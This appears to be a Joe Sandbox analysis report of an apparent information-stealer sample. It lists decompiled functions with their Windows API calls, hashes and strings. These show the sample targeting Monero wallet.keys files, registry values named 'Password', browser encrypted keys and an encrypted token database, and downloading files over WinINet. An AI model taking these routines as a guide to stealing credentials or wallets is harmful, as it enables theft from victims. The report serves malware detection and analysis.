                                • Opcode Fuzzy Hash: dff6ca99cc3e0670e132e871b64810bef6445bde43fc8f48c0b63c93ef4db250
                                • Instruction Fuzzy Hash: EAC196B5D002199BCB18EF60DC89FDA73B8FF54304F0455AAF50A77241EA70AA86CF91
                                Function 00ED4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED42EC
                                • lstrcat.KERNEL32(?,01B8DE30), ref: 00ED430B
                                • lstrcat.KERNEL32(?,?), ref: 00ED431F
                                • lstrcat.KERNEL32(?,01B8CE98), ref: 00ED4333
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8D90: GetFileAttributesA.KERNEL32(00000000,?,00EC1B54,?,?,00EE564C,?,?,00EE0E1F), ref: 00ED8D9F
                                  • Part of subcall function 00EC9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED93C0: GlobalAlloc.KERNEL32(00000000,00ED43DD,00ED43DD), ref: 00ED93D3
                                • StrStrA.SHLWAPI(?,01B8DFB0), ref: 00ED43F3
                                • GlobalFree.KERNEL32(?), ref: 00ED4512
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED44A3
                                • StrCmpCA.SHLWAPI(?,00EE08D1), ref: 00ED44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00ED44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00ED44E5
                                • lstrcat.KERNEL32(00000000,00EE0FB8), ref: 00ED44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: cf1e56eff342d55e324d03721c3bdc29789550e02413e674e95a6deb4d111f09
                                • Instruction ID: 5cccb715076cd7db99bd43f69d829d861c5fe5c9acf127878e033eb582657fcc
                                • Opcode Fuzzy Hash: cf1e56eff342d55e324d03721c3bdc29789550e02413e674e95a6deb4d111f09
                                • Instruction Fuzzy Hash: 5F7177B6D00208ABCB14EBB0EC89FED73B9BF48300F045599F615A7181DA75DB56CB91
                                Function 00EC1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                  • Part of subcall function 00EC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                  • Part of subcall function 00EC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                  • Part of subcall function 00EC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                  • Part of subcall function 00EC12A0: RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EC134F
                                • lstrlen.KERNEL32(?), ref: 00EC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EC1377
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EC1465
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 7faa12a9254d663e1f645a30e8d1a2a50ed5d55c0b9a2e20a07030a375ab6b4f
                                • Instruction ID: 3585d613e17d6b6ecd3428e59d604512a235b6ea4fd77d1bfc87a39d7ad8db8d
                                • Opcode Fuzzy Hash: 7faa12a9254d663e1f645a30e8d1a2a50ed5d55c0b9a2e20a07030a375ab6b4f
                                • Instruction Fuzzy Hash: 245174B2D102185BCB19EB60DD96FED73BCEF50300F4451B9B60A72182EE705B86CBA5
                                Function 00EC75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EC72D0: memset.MSVCRT ref: 00EC7314
                                  • Part of subcall function 00EC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                  • Part of subcall function 00EC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                  • Part of subcall function 00EC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                  • Part of subcall function 00EC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                  • Part of subcall function 00EC72D0: HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • lstrcat.KERNEL32(00000000,00EE17FC), ref: 00EC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC768F
                                • lstrcat.KERNEL32(00000000,00EE1804), ref: 00EC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC76D3
                                • lstrcat.KERNEL32(00000000,00EE1808), ref: 00EC76ED
                                • task.LIBCPMTD ref: 00EC76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction ID: c0a799a38b44c012a6b0c8bd4e4b53906d9b268a07007b2f52af7c2a423af6fe
                                • Opcode Fuzzy Hash: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction Fuzzy Hash: 74314F72D00209DFCB19EBA4EE45EEE77B4BF48301B10512DF112B7284DA75AA87CB50
                                Function 00EC72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00EC7314
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                • HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • task.LIBCPMTD ref: 00EC7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction ID: 703c6d87661752b6833fd219ebc6f3ac215aeb7cb548615c18adbfcf05a515d4
                                • Opcode Fuzzy Hash: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction Fuzzy Hash: 87614CB590425C9BDB24DB50DE45FDAB7B8BF44300F0091E9E689B6141DBB15BCACF90
                                Function 00ED8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01B8DCE0,00000000,?,00EE0E2C,00000000,?,00000000), ref: 00ED8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00ED8158
                                • __aulldiv.LIBCMT ref: 00ED8172
                                • __aulldiv.LIBCMT ref: 00ED8180
                                • wsprintfA.USER32 ref: 00ED81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction ID: b6ee2052684381bc1372dd8d7922b62df2d91b1374f92d0bbcddbae7d056d318
                                • Opcode Fuzzy Hash: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction Fuzzy Hash: CF215EB1E44318ABDB14DFD4DD49FAEB7B8FB44B00F10421AF615BB284D7B869018BA4
                                Function 00EC60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                • InternetOpenA.WININET(00EE0DF7,00000001,00000000,00000000,00000000), ref: 00EC610F
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EC6249
                                • InternetCloseHandle.WININET(?), ref: 00EC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction ID: e0911f4c0bf2d9b16d8feea643ebae9d7aa14b3143bd26ce22822ad91371458d
                                • Opcode Fuzzy Hash: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction Fuzzy Hash: AB5180B1900218ABDB24DF50DD49FEE77B8EF44305F1090A9B605B72C0DBB66A86CF95
                                Function 00ECBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00ECBC9F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ECBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction ID: de55d2ae355b58e6b2fd3ca424d84b5ce2cc7b0de73918fb832eeda85f847585
                                • Opcode Fuzzy Hash: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction Fuzzy Hash: B7B154769102089BCB18EBA0DD96EEE73B8EF54300F44517AF50673191EF746B4ACB62
                                Function 00ED6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
